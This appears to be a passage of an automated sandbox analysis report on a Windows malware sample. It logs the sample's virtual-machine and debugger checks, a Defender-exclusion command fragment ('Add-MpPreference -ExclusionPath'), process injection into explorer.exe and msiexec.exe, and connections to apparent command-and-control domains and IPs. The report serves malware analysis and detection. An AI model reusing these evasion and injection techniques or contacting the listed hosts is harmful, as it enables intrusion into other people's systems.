          Source: explorer.exe, 00000004.00000000.693765738.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: g1EhgmCqCD.exe, 00000001.00000002.667933486.0000000002A62000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
          Source: explorer.exe, 00000004.00000000.694412847.000000000A9CC000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}%%
          Source: g1EhgmCqCD.exe, 00000001.00000002.667933486.0000000002A62000.00000004.00000001.sdmpBinary or memory string: VMWARE
          Source: g1EhgmCqCD.exe, 00000001.00000002.667933486.0000000002A62000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000004.00000002.919520811.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: explorer.exe, 00000004.00000002.921706000.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000004.00000000.693874904.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: explorer.exe, 00000004.00000002.921706000.00000000058C0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: g1EhgmCqCD.exe, 00000001.00000002.667933486.0000000002A62000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
          Source: g1EhgmCqCD.exe, 00000001.00000002.667933486.0000000002A62000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
          Source: explorer.exe, 00000004.00000000.693874904.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: g1EhgmCqCD.exe, 00000001.00000002.667933486.0000000002A62000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
          Source: g1EhgmCqCD.exe, 00000001.00000002.667561253.0000000000CEF000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: explorer.exe, 00000004.00000002.921706000.00000000058C0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_004088A0 rdtsc
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_00409B10 LdrLoadDll,
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019BFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019BFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A069A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A505AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A505AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019B2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01982D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01982D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01982D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01982D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01982D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019AC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019B2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019B2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019B2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019B2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019BA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A051BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A051BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A051BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A051BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019B1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019B1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019B1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019B35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019B61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019B61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A4FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A4FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A4FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A4FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A141E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A38DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A06DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A06DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A06DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A06DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A06DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A06DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_0198B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_0198B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_0198B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_0199D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_0199D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A58D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A0A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01989100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01989100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01989100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A4E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019B4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019B4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019B4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019B513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019B513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_0198AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01993D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01993D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01993D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01993D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01993D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01993D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01993D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01993D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01993D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01993D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01993D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01993D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01993D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019A4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019A4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019A4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019A4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019A4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019A7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019AB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019AB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019C3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A03540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_0198B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_0198B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019AC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019AC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_0198C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_0199849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01989080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019BF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019BF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019BF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A03884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A03884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019C90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019B20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019B20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019B20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019B20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019B20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019B20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A06CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A06CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A06CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A414FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A1B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A1B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A1B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A1B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A1B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A1B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A58CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019858EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00E9AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EBFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F1FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EBD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EBD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00E9766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F3B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F3B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EC927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F58A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EAAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EAAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EAAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EAAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EAAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F4EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F14257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00E89240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00E89240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00E89240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00E89240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00E97E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00E97E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00E97E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00E97E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00E97E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00E97E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F4AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F4AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EC4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EC4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00E8E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F3FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00E98A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00E8C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00E8C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00E8C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EB8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EA3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EBA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EBA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00E85210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00E85210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00E85210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00E85210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F41608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00E8AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00E8AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EADBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EB03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EB03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EB03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EB03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EB03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EB03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EC37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F053CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F053CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EB4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EB4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EB4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F55BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F07794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F07794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\msiexec.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe Network Connect: 107.180.51.23 80
          Source: C:\Windows\explorer.exe Network Connect: 184.168.131.241 80
          Source: C:\Windows\explorer.exe Domain query: www.kayandbernard.com
          Source: C:\Windows\explorer.exe Domain query: www.anygivenrunday.com
          Source: C:\Windows\explorer.exe Domain query: www.cats16.com
          Source: C:\Windows\explorer.exe Network Connect: 172.247.179.61 80
          Source: C:\Windows\explorer.exe Domain query: www.gb-contracting.com
          Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exe Domain query: www.fnatic-skins.club
          Source: C:\Windows\explorer.exe Domain query: www.benleefoto.com
          Source: C:\Windows\explorer.exe Domain query: www.effectivemarketinginc.com
          Source: C:\Windows\explorer.exe Domain query: www.donelys.com
          Source: C:\Windows\explorer.exe Domain query: www.timbraunmusician.com
          Source: C:\Windows\explorer.exe Domain query: www.palomachurch.com
          Source: C:\Windows\explorer.exe Network Connect: 198.54.117.216 80
          Source: C:\Windows\explorer.exe Domain query: www.web-evo.com
          Injects a PE file into a foreign process
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Memory written: C:\Users\user\Desktop\g1EhgmCqCD.exe base: 400000 value starts with: 4D5A
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Section loaded: unknown target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Section loaded: unknown target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Thread register set: target process: 3424
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Thread register set: target process: 3424
          Source: C:\Windows\SysWOW64\msiexec.exe Thread register set: target process: 3424
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Thread APC queued: target process: C:\Windows\explorer.exe
